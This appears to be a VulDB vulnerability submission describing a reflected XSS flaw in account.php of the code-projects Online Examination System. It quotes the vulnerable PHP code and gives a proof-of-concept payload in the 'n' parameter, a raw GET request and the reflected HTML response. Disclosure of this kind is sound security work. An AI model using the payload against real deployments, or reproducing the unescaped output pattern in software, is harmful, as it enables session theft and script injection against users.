Gửi #857999: Reflected XSS Vulnerability in account.php of the Online Examination System v1 Reflected XSSthông tin

tiêu đềReflected XSS Vulnerability in account.php of the Online Examination System v1 Reflected XSS
Mô tả# Reflected XSS Vulnerability in `account.php` of the Online Examination System The quiz answering function of the Online Examination System is handled by `account.php`. When a user accesses the quiz page with `q=quiz&step=2`, the backend reads the `eid`, `n`, and `t` parameters from the URL. In the code, `account.php:164-166` directly reads these parameters, and `account.php:176` concatenates them into the HTML form `action` attribute without any output encoding: ```php $eid=@$_GET['eid']; $sn=@$_GET['n']; $total=@$_GET['t']; ... echo '<form action="update.php?q=quiz&step=2&eid='.$eid.'&n='.$sn.'&t='.$total.'&qid='.$qid.'" method="POST" class="form-horizontal"> <br />'; ``` Because the application does not perform HTML escaping or output sanitization, an attacker can inject malicious script content through the `n` parameter, resulting in a reflected Cross-Site Scripting (XSS) vulnerability. This endpoint is not publicly accessible. It requires an authenticated student session because `account.php` checks for `$_SESSION['email']` before rendering the page. ## Impact of the Reflected XSS Vulnerability An attacker can exploit this vulnerability to execute arbitrary JavaScript in the victim's browser within the context of the authenticated student session. This may lead to session theft, sensitive data disclosure, page content manipulation, phishing, or unauthorized actions performed on behalf of the victim. ## Payload Injection parameter: `n` Injected value: ```text "><sCrIpT>alert(9999)</sCrIpT> ``` Request method: `GET` Request path: ```text /account.php?q=quiz&step=2&eid=6a20deccc257d&n="><sCrIpT>alert(9999)</sCrIpT>&t=1 ``` Raw request: ```http GET /account.php?q=quiz&step=2&eid=6a20deccc257d&n="><sCrIpT>alert(9999)</sCrIpT>&t=1 HTTP/1.1 Host: project1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Edg/x.x.x.x Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://project1/account.php?q=1 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Cookie: PHPSESSID=2347fp9qoucglmem34csap1fbp Connection: keep-alive ``` Reflected response snippet: ```html <!--quiz start--> <div class="panel" style="margin:5%"><form action="update.php?q=quiz&step=2&eid=6a20deccc257d&n="><sCrIpT>alert(9999)</sCrIpT>&t=1&qid=" method="POST" class="form-horizontal"> <br /><br /><button type="submit" class="btn btn-primary"><span class="glyphicon glyphicon-lock" aria-hidden="true"></span>&nbsp;Submit</button></form></div><!--quiz end--> ``` The response shows that the injected payload is reflected into the HTML without encoding, which can cause the browser to parse and execute the attacker-controlled script. ## Sources Download ## ``` - [Online Examination In PHP With Source Code - Source Code & Projects](https://code-projects.org/online-examination-in-php-with-source-code/) ``` [Online Examination In PHP With Source Code - Source Code & Projects](https://code-projects.org/online-examination-in-php-with-source-code/)
Nguồn⚠️ https://github.com/zzzxc643/CVE1/blob/main/project1/vul5.md
Người dùng
 SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936)
Đệ trình13/06/2026 16:05 (cách đây 1 tháng)
Kiểm duyệt18/07/2026 12:07 (1 month later)
Trạng tháiđược chấp nhận
Mục VulDB380043 [code-projects Online Examination System 1.0 /account.php?q=quiz eid/n/t Tập lệnh chéo trang]
điểm20

Interested in the pricing of exploits?

See the underground prices here!